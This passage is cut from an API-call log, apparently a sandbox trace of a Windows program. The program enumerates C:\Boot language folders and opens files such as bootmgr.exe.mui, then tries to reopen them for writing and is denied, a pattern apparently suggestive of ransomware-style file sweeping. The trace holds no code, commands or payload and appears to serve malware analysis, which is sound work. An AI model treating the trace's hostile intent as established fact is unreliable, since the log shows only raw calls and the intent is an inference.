dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.859] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.859] CloseHandle (hObject=0x418) returned 1 [0070.859] AreFileApisANSI () returned 1 [0070.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0070.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0070.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=35 | out: lpWideCharStr="C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui") returned 35 [0070.859] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.859] GetLastError () returned 0x5 [0070.859] GetLastError () returned 0x5 [0070.859] SetLastError (dwErrCode=0x5) [0070.859] GetLastError () returned 0x5 [0070.859] SetLastError (dwErrCode=0x5) [0070.859] GetLastError () returned 0x5 [0070.859] SetLastError (dwErrCode=0x5) [0070.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0070.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0070.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.860] FindNextFileW (in: hFindFile=0x78350, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x44, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x6d1c0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x44, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓ⵠ\x01⺊Ā")) returned 0 [0070.860] FindClose (in: hFindFile=0x78350 | out: hFindFile=0x78350) returned 1 [0070.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0070.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0070.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0070.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0070.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0070.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0070.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.861] AreFileApisANSI () returned 1 [0070.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\sv-SE", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\sv-SE", lpUsedDefaultChar=0x0) returned 14 [0070.861] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.861] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0070.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0070.861] AreFileApisANSI () returned 1 [0070.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x886a8 [0070.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x886a8, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\sv-SE") returned 14 [0070.861] CreateFileW (lpFileName="C:\\Boot\\sv-SE" (normalized: "c:\\boot\\sv-se"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.861] GetLastError () returned 0x5 [0070.861] GetLastError () returned 0x5 [0070.861] SetLastError (dwErrCode=0x5) [0070.861] GetLastError () returned 0x5 [0070.861] SetLastError (dwErrCode=0x5) [0070.861] GetLastError () returned 0x5 [0070.861] SetLastError (dwErrCode=0x5) [0070.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.861] AreFileApisANSI () returned 1 [0070.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88748 [0070.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88748, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\sv-SE") returned 14 [0070.862] CreateFileW (lpFileName="C:\\Boot\\sv-SE" (normalized: "c:\\boot\\sv-se"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.862] GetLastError () returned 0x5 [0070.862] GetLastError () returned 0x5 [0070.862] SetLastError (dwErrCode=0x5) [0070.862] GetLastError () returned 0x5 [0070.862] SetLastError (dwErrCode=0x5) [0070.862] GetLastError () returned 0x5 [0070.862] SetLastError (dwErrCode=0x5) [0070.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0070.862] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.862] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.862] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.862] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.862] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206504, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6b5aca, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0070.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0070.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0070.862] FindFirstFileExW (in: lpFileName="C:\\Boot\\sv-SE\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x784d0 [0070.863] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01adf43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6a2250, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.863] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0070.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0070.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0070.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0070.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0070.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0070.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0070.864] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.864] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.864] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.864] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0070.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.865] AreFileApisANSI () returned 1 [0070.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\sv-SE\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\sv-SE\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0070.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0070.865] AreFileApisANSI () returned 1 [0070.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0070.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned 30 [0070.865] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0070.865] GetFileType (hFile=0x418) returned 0x1 [0070.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0070.865] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.866] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.866] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.866] CloseHandle (hObject=0x418) returned 1 [0070.866] AreFileApisANSI () returned 1 [0070.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0070.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned 30 [0070.866] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.866] GetLastError () returned 0x5 [0070.866] GetLastError () returned 0x5 [0070.866] SetLastError (dwErrCode=0x5) [0070.866] GetLastError () returned 0x5 [0070.866] SetLastError (dwErrCode=0x5) [0070.866] GetLastError () returned 0x5 [0070.866] SetLastError (dwErrCode=0x5) [0070.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0070.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0070.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.867] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.867] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.867] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6a2250, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f699a6, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xaf98, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0070.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0070.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0070.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0070.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0070.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0070.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0070.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0070.867] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.867] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0070.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.868] AreFileApisANSI () returned 1 [0070.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\sv-SE\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\sv-SE\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0070.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0070.868] AreFileApisANSI () returned 1 [0070.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 